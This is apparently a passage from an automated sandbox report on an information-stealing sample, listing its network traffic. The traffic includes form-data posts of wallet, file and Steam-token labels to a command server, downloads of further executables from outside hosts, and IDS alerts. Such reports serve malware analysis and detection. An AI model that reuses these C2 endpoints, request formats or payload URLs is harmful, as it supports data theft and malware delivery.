67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="message"wallets------FBGHCGCAEBFIJKFIDBGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 2d 2d 0d 0a Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="message"files------HCAEGCBFHJDGCBFHDAFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 2d 2d 0d 0a Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file"------CGDHIEGCFHCGDGCAECBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"ybncbhylepme------DGHJECAFIDAFHJKFCGHI--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDGHJEHJJDAAAKEBGCFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: GET /files/7299809293/qk4EiZw.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 39 33 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012933001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 39 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012942001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 39 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012943001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 30 36 35 42 36 39 35 33 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="hwid"AF065B6953323653143898------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="build"drum------DHDBGHCBAEGCBFHJEBFI--

Source: Joe Sandbox View

IP Address: 185.215.113.43 185.215.113.43

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49701 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49788 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49829 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49915 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49936 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49959 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49954 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49966 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49994 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50005 -> 104.21.16.9:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CE7CC60 PR_Recv,

0_2_6CE7CC60

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PpmzE7nWNbHrURx&MD=ocWWztpu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
